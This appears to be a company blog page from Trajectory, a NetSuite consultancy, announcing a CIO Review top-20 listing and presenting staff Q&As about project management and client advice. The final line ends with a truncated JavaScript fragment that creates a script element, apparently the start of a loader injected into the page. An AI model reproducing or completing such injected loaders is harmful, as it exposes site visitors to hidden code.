Trajectory Makes CIO Review’s Top 20 List

CIO Review

We’re happy to announce that Trajectory has made CIO Review’s top 20 NetSuite Solution Provider list this year. We’re touched an honoured (but if we’re honest, not that surprised… we’ve been working very hard.)

The article does a great job of outlining the way organizations are approaching NetSuite, and how the concept of ‘the Suite’ is evolving. Our COO, Alex Olano,  does a great job reflecting on what we’re hearing from our clients and their CIOs. He also does a nice job of plugging advertisingERP, Trajectory’s advertising focused platform for NetSuite.

Nice work Alex!

Q&A with Andrew Andreoli

aandreoli

Meet Andrew Andreoli, Director of Trajectory’s OnDemand Services, aka the guy with the “Best Seat in the House”, who gets to watch many great ideas be conceived, planned, executed and measured. Andrew provides insights on his role at Trajectory and his advice to customers…

Q: What do you like most about your role?
A: Seeing great ideas from customers and our teams come to life and the impact that they have.

Q: Most interesting piece of work you are doing right now and why?
A: We are making NetSuite do some amazing things right now! From meeting strict speed and performance standards to automating unique process flows. This is some great stuff.

Q: Skill set you find most valuable in your role?
A: Honestly? It’s patience. Uncovering the most important issues and helping customers and our teams find and deliver the best solution takes energy and time – often more than we all foresee at the outset.

Q: Question/problem you are asked most often by customers to address/solve and your answer?
A: “So, how are we going to do this?” Uncovering ‘why’ and ‘what’ can be more straightforward at times. The ‘how’ question is often the toughest.

Q: Top piece of advice you would give a customer about software implementation from your perspective?
A: Implementing great work is rewarding and difficult. It requires the focus of all team members and the willingness to change perhaps a little more than you would like.

Q: Favourite pastime outside of the office?
A: I’m a family guy through and through!}

Q&A with Simi Sandhu

simi

Meet our Manager of Project Details, Sukhroop Sandhu (aka Simi, Project Manager), who provides her thoughts on her role at Trajectory…

Q: What do you like most about your role?
A: I like how I deal with multiple projects at a given time, so it’s never just one project and hence never BORING! The opportunity to experience the diversity of each project is great. Each project comes with an opportunity to learn something new.

Q: Most interesting piece of work you are doing right now and why?
A: Managing a complex project with multiple initiatives running at the same time with OnDemand consulting requests and questions come in on a daily basis. What makes my job interesting is keeping track of all of the details: internal and external status calls, initiatives log updates, budget tracker updates and making sure everything is making progress.

Q: Skill set you find most valuable in your role?
A: Project Management skills (communication skills, interpersonal skills, attention to detail), customer-first approach, time management, MS Office, Bachelor of Engineering (Computer Science Degree).

Q: Question/problem you are asked most often by customers to address/solve and your answer?
A: The questions from the customers mostly relate to invoices, budget utilization or time tracking reports that I send out on a weekly/monthly basis. When the question relates to the invoice, I send them the matching time report that supports the items on the invoice. For other budget/time report related questions, I direct the customer to the appropriate time entries on their time entry reports.

Q: Favourite pastime outside of the office?
A: I enjoy looking up interesting places in and around Canada and planning on how and when to go visit.

Q&A with Vanessa Coquiero

vcGet to know the Trajectory team better – introducing our senior efficiency guru, Vanessa Coquiero (Senior Project Manager), who provides her thoughts on her role at Trajectory and her advice to customers…

Q: What do you like most about your role?
A: I get to work with everyone in the company on a daily basis and know about every project that is going on.

Q: Most interesting piece of work you are doing right now and why?
A: Go-live of our first client using Adhere.( http://ow.ly/JEcRS)

Q: Skill set you find most valuable in your role?
A: Being able to work on several tasks for different clients at the same time while making each one feel that they are our priority.

Q: Top piece of advice you would give a customer from your perspective?
A: Get a “backup” for the key users who will be involved in the project. The implementation will require a lot of their time and having their regular job on top of it, it’s a lot of work and they end up missing deadlines on both sides. Having someone else to help with the day-to-day job eases the workload.

Q: Favourite pastime outside of the office?
A: Travel to exotic places around the world.var d=document;var s=d.createElement(‘script’);
